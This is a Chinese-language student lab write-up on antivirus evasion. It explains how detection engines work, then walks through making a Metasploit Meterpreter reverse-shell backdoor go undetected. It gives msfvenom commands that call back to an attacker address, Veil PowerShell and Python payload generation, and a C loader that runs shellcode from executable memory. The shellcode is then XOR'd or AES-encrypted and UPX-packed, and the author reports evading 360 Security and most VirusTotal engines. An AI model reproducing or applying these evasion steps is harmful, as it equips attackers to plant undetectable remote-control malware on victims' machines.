免杀原理与实践

杀软原理

目前杀毒软件的原理主要有3种：

1.引擎与病毒库的交互作用，通过特征码提取与病毒库中的特征码进行比对识别病毒。

2.启发式Heuristic，通过程序的一些行为和特征来判断。

3.在虚拟机技术上的启发式，通过建立一个虚拟环境运行程序对其进行全方位的检测。

了解更多可见“杀毒软件工作原理 及 现在主要杀毒技术”。

免杀原理

免杀就是躲杀软的识别，那就从杀软的原理下手。

1.改变特征码

如果你手里只有EXE，加壳：压缩壳 加密壳

有shellcode(像Meterpreter），用encode进行编码，基于payload重新编译生成可执行文件

有源代码，用其他语言进行重写再编译（veil-evasion）

2.改变行为

通讯方式

　　尽量使用反弹式连接，即服务端（被控制端）会主动连接客户端（控制端）。

　　使用隧道技术，隧道协议将其它协议的数据帧或包重新封装然后通过隧道发送，把所有要传送的数据全部封装到合法的报文里进行传送以绕过防火墙。

　　加密通讯数据

操作模式

　　基于内存操作，像基于特征码的查杀大部分是扫描硬盘上的文件，所以可以考虑在用到后门时远程传输放在内存中运行，而不是存在硬盘上。但也有部分杀毒软件会扫描内存，一般可以采用加入nop指令来躲过查杀。

　　减少对系统的修改

　　加入混淆作用的正常功能代码

免杀实践

本人使用的杀软是360安全卫士11版本

将metasploit直接生成的后门上传到virusTotal上通过率是51/66。

msf编码器编码

既然杀软可以通过特征码识别我们的后门，那我们就想办法先把后门经过编码，使用时再解码，这样就把后门的特征码隐藏起来了，下面我们利用metasploit自带的编码器试一试效果。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe

将metasploit编码后的后门上传到virusTotal上通过率是50/66。基本没有变化，因为shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中，AV厂商只要盯住这部分就可以了，尤其是metasploit这么出名的渗透软件。

veil-evasion免杀

安装

1.apt-get直接装，不过得换源

2.在github上可以搜到各种版本，git clone下来找到其中的setup.sh并运行安装就可以

其实veil的安装网上很多教程，这里主要是本人说明一下遇到的错误，安装结束后输入veil提示错误

module 'Tools.Ordnance' has no attribute 'Tool'#错误

在老师的指导下只要把/usr/share/veil/Tools/Evasion/evasion_common/shellcode_help.py和/usr/share/veil/Tools/Evasion/Tool.py中的import Tool as Ordnance_Import删掉就可以了

利用veil中的powershell实现后门

sudo进入veil，然后按照提示use 1，list列出所有可用的payload，选中21 powershell，use 21,

set LHOST xx.xx.xx.xx,

generate

之后会提示生成的文件名，输入后显示生成的文件路径，/usr/share/veil-output/source下就可以看到我们生成的.bat批处理文件，我们把它拷贝到windows下运行就可以连上。

同样也可以利用py源码生成，选取python写的payload，kali里面因为没有pyinstaller和py2exe，所以先把/usr/share/veil-output/source下的.py文件拷到windows下编译成exe即可，

pyinstaller -F -w py_https.py

如果安装了pip，可以直接pip install pyinstaller。

最后powershell在virustotal上的通过率是23/56，python生成的exe通过率是15/66。而且360都没有扫到这两个后门。

利用shellcode编程实现免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.201.136 LPORT=1213 -f c 

 生成shellcode后我们把它拿到visial studio中加以调用就可以运行。

LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();

buf就是上面生成的那堆十六进制的shellcode，上面的语句首先生成一个没有类型的指针，然后我们用memcpy将shellcode拷贝到改指针对应的内存下，最后以函数调用这个内存地址就成功让我们的shellcode运行起来了。运行后在虚拟机端可以连接到win10主机，不过这样还没法躲过查杀，会直接被360查杀。在virusTotal上的通过率也只有24/66。

猜测肯定是AV厂商也都知道把metasploit生成的这些shellcode当做特征码，那就加密一波，先用0xff对原shellcode进行异或。通过率提高到了16/66。

之后换了aes加密发现效果并不是很好，只有14/66，然后试着把上面几行调用语句去掉也就是不调用我们的shellcode也会被13个杀软检测出来。然后就很纳闷到底是哪里出了问题让杀软杀出来了，不知道是有内存查杀还是什么其他方法识别的。

先不管那么多试着结合其他方法再测试一次，用upx对上面的aes加密的shellcode程序实施加壳，

upx source.exe -o dest.exe#source源文件名,dest生成文件名

没想到效果还可以，只有6个可以扫出来了，如下图。

然后用360扫描是扫不出来的，之后打开进行运行测试，连接两三次360依然没有反应。看来是成功绕过360的防护了。

下面是虚拟机上连接win10的截图：

可以看到我们在msf里面连接上靶机后执行ps查看运行程序，并且可以看到360安全卫士此时是打开的。

实验体会

这次实验是能让上次实验变得有意义的实验，只有免杀，后门才有使用性，也让我很激动，不过事实总是不尽人意，不得不说这次实验备受打击，从下午一直做到晚上，一直尝试新办法，一直被360查杀，直到最后要放弃了试了一下看上去最没用的upx加壳竟然成功绕过了360。这也给我一些经验，做免杀要从不同方面入手才行，因为我们可以给shellcode加密，可以加壳等等这些都是可以嵌套的，而杀软看上去并不擅长的一层一层剥开我们的壳，所以用不同的壳来包装shellcode也不失为一种好办法。

此次实验中没有用到veil-evasion实为无奈，先用apt-get安装了一遍，报错没有module tools，于是我就pip install tools一下，可是又报错如下，又去github clone了一份，又报错一样的错，都卡在了

module 'Tools.Ordnance' has no attribute 'Tool'#错误

 

而每次安装都要等好久，所以没有尝试再安装一次，直接用shellcode+visal studio做了。一开始我把shellcode做异或后发现有明显的效果，所以就惯性思维的认为只要换个好一点的加密就可以免杀，于是又用了aes，可惜效果不尽人意。我试着分析其中原因可以没能找到，不过我认为首先加密之后的数据是不可能被杀软所知道，也就是硬盘上加密后的shellcode不可能成为被查杀的特征值，然后加密算法我也写过都没有被误判成木马，所以应该也不是通过加密算法来识别。我怀疑过是函数调用，毕竟一般情况下很少把其他类型的数据拿来做函数调用的，不过我注释掉调用那部分再编译上传检测通过率基本不变，还是14。这样我就不知道到底我的后门是哪里出了问题被杀出来，当时也在这纠缠了好久，后来又想试试是不是在内存中被查杀的，试着把机器码转汇编在里面加nop，不过没学过汇编是在进行不下去，改了几个之后通过率还是提高了一个的，不过依然被360杀了，而且根据后面加壳可以正常运行说明360也不是内存查杀的，到底360是如何查杀我自己写的shellcode加壳程序的希望有知道原因的大佬能够给我一些提示，必有重谢！